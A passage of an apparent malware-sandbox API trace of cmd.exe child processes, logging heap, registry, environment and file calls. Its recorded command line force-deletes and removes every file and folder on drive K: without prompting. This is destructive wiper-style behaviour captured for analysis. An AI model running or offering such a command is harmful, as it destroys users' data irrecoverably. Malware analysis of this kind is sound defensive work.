0x600000 [0067.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4008) returned 0x61aaf8 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x61aaf8 | out: hHeap=0x600000) returned 1 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616ae0 | out: hHeap=0x600000) returned 1 [0067.561] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.561] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.561] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.561] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.561] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613110 [0067.561] GetProcessHeap () returned 0x600000 [0067.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xe) returned 0x60ffc0 [0067.562] GetProcessHeap () returned 0x600000 [0067.562] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20) returned 0x6157e0 [0067.562] GetProcessHeap () returned 0x600000 [0067.562] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6157e0, Size=0x16) returned 0x611800 [0067.562] GetProcessHeap () returned 0x600000 [0067.562] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x611800) returned 0x16 [0067.562] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613170 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14) returned 0x6131d0 [0067.563] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.563] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12) returned 0x6131f0 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c) returned 0x6157e0 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6157e0, Size=0x14) returned 0x613210 [0067.563] GetProcessHeap () returned 0x600000 [0067.563] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x613210) returned 0x14 [0067.563] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.564] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.564] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.564] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.564] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.564] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.564] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.564] GetProcessHeap () returned 0x600000 [0067.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613230 [0067.564] GetProcessHeap () returned 0x600000 [0067.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10) returned 0x60ffd8 [0067.564] GetProcessHeap () returned 0x600000 [0067.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28) returned 0x613290 [0067.565] GetProcessHeap () returned 0x600000 [0067.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x6132c0 [0067.565] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.565] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.565] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.565] GetProcessHeap () returned 0x600000 [0067.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613320 [0067.565] GetProcessHeap () returned 0x600000 [0067.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x44) returned 0x613380 [0067.566] GetProcessHeap () returned 0x600000 [0067.566] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14) returned 0x6133d0 [0067.566] GetProcessHeap () returned 0x600000 [0067.566] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6133d0, Size=0x12) returned 0x6133d0 [0067.566] GetProcessHeap () returned 0x600000 [0067.566] RtlSizeHeap (HeapHandle=0x600000, Flags=0x0, MemoryPointer=0x6133d0) returned 0x12 [0067.566] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.566] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.566] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.566] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.566] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.566] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.567] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.567] GetProcessHeap () returned 0x600000 [0067.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12) returned 0x6133f0 [0067.568] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.568] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.568] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.568] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.568] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.568] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.568] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.568] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.568] GetProcessHeap () returned 0x600000 [0067.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x58) returned 0x613410 [0067.568] GetProcessHeap () returned 0x600000 [0067.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14) returned 0x613470 [0067.568] GetProcessHeap () returned 0x600000 [0067.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x20) returned 0x6157e0 [0067.570] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.571] GetFullPathNameW (in: lpFileName="J:", nBufferLength=0x208, lpBuffer=0x39f340, lpFilePart=0x39f0ec | out: lpBuffer="J:\\", lpFilePart=0x39f0ec*=0x0) returned 0x3 [0067.571] wcsncmp (_String1="J:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -18 [0067.575] GetFileAttributesW (lpFileName="J:\\" (normalized: "j:")) returned 0xffffffff [0067.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.576] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.576] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.576] SetConsoleInputExeNameW () returned 0x1 [0067.576] GetConsoleOutputCP () returned 0x1b5 [0067.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.577] exit (_Code=0) Process: id = "55" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42272000" os_pid = "0x7a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0x71c [0067.720] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe14 | out: lpSystemTimeAsFileTime=0x2efe14*(dwLowDateTime=0x62c70c0, dwHighDateTime=0x1d62400)) [0067.720] GetCurrentProcessId () returned 0x7a8 [0067.720] GetCurrentThreadId () returned 0x71c [0067.720] GetTickCount () returned 0x11485a4 [0067.720] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe0c | out: lpPerformanceCount=0x2efe0c*=18785389070) returned 1 [0067.722] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.722] __set_app_type (_Type=0x1) [0067.722] __p__fmode () returned 0x770331f4 [0067.722] __p__commode () returned 0x770331fc [0067.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.723] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.723] GetCurrentThreadId () returned 0x71c [0067.723] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x71c) returned 0x60 [0067.723] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.723] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.723] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.724] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.724] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efda4 | out: phkResult=0x2efda4*=0x0) returned 0x2 [0067.724] VirtualQuery (in: lpAddress=0x2efddb, lpBuffer=0x2efd74, dwLength=0x1c | out: lpBuffer=0x2efd74*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.724] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efd74, dwLength=0x1c | out: lpBuffer=0x2efd74*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.724] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efd74, dwLength=0x1c | out: lpBuffer=0x2efd74*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.724] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efd74, dwLength=0x1c | out: lpBuffer=0x2efd74*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.724] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efd74, dwLength=0x1c | out: lpBuffer=0x2efd74*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.724] GetConsoleOutputCP () returned 0x1b5 [0067.724] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.725] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.725] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.725] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.725] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.725] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.725] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.725] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.726] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.726] GetEnvironmentStringsW () returned 0x3220f8* [0067.726] GetProcessHeap () returned 0x310000 [0067.726] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xaca) returned 0x322bd0 [0067.726] FreeEnvironmentStringsW (penv=0x3220f8) returned 1 [0067.726] GetProcessHeap () returned 0x310000 [0067.726] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x4) returned 0x321898 [0067.726] GetEnvironmentStringsW () returned 0x3220f8* [0067.727] GetProcessHeap () returned 0x310000 [0067.727] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xaca) returned 0x3236a8 [0067.727] FreeEnvironmentStringsW (penv=0x3220f8) returned 1 [0067.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed14 | out: phkResult=0x2eed14*=0x68) returned 0x0 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x0, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x1, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x1, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x0, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x40, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x40, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.727] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x40, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.728] RegCloseKey (hKey=0x68) returned 0x0 [0067.728] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed14 | out: phkResult=0x2eed14*=0x68) returned 0x0 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x40, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x1, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x1, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x0, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x9, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x4, lpData=0x2eed20*=0x9, lpcbData=0x2eed18*=0x4) returned 0x0 [0067.728] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed1c, lpData=0x2eed20, lpcbData=0x2eed18*=0x1000 | out: lpType=0x2eed1c*=0x0, lpData=0x2eed20*=0x9, lpcbData=0x2eed18*=0x1000) returned 0x2 [0067.728] RegCloseKey (hKey=0x68) returned 0x0 [0067.728] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.728] srand (_Seed=0x5eb34b6d) [0067.728] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" [0067.728] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"K:\" del /f /s /q \"K:\" & FOR /D %p IN (\"K:\") DO rmdir \"%p\" /s /q" [0067.729] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.729] GetProcessHeap () returned 0x310000 [0067.729] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x210) returned 0x3220f8 [0067.729] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x322100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.730] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.731] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.731] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.731] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.731] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.731] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.731] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.731] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.731] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.731] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.731] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.731] GetProcessHeap () returned 0x310000 [0067.731] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x322bd0 | out: hHeap=0x310000) returned 1 [0067.731] GetEnvironmentStringsW () returned 0x322310* [0067.731] GetProcessHeap () returned 0x310000 [0067.731] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xae2) returned 0x324c70 [0067.731] FreeEnvironmentStringsW (penv=0x322310) returned 1 [0067.731] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.731] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.731] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.732] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.732] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.732] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.732] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.732] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.732] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.732] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.732] GetProcessHeap () returned 0x310000 [0067.732] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x54) returned 0x3217c8 [0067.732] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efae0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.732] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2efae0, lpFilePart=0x2efadc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2efadc*="Desktop") returned 0x25 [0067.732] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.732] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef85c | out: lpFindFileData=0x2ef85c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x325760 [0067.732] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0067.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef85c | out: lpFindFileData=0x2ef85c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x325760 [0067.733] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0067.733] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef85c | out: lpFindFileData=0x2ef85c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x325760 [0067.733] FindClose (in: hFindFile=0x325760 | out: hFindFile=0x325760) returned 1 [0067.733] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.733] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.733] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.733] GetProcessHeap () returned 0x310000 [0067.733] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x324c70 | out: hHeap=0x310000) returned 1 [0067.733] GetEnvironmentStringsW () returned 0x324180* [0067.733] GetProcessHeap () returned 0x310000 [0067.733] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xb36) returned 0x325fa0 [0067.734] FreeEnvironmentStringsW (penv=0x324180) returned 1 [0067.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.734] GetProcessHeap () returned 0x310000 [0067.734] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x3217c8 | out: hHeap=0x310000) returned 1 [0067.734] GetProcessHeap () returned 0x310000 [0067.734] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x400e) returned 0x326ae0 [0067.734] GetProcessHeap () returned 0x310000 [0067.734] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0xa0) returned 0x322e50 [0067.734] GetProcessHeap () returned 0x310000 [0067.734] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x326ae0 | out: hHeap=0x310000) returned 1 [0067.734] GetConsoleOutputCP () returned 0x1b5 [0067.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.735] GetUserDefaultLCID () returned 0x409 [0067.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efc20, cchData=128 | out: lpLCData="0") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efc20, cchData=128 | out: lpLCData="0") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efc20, cchData=128 | out: lpLCData="1") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 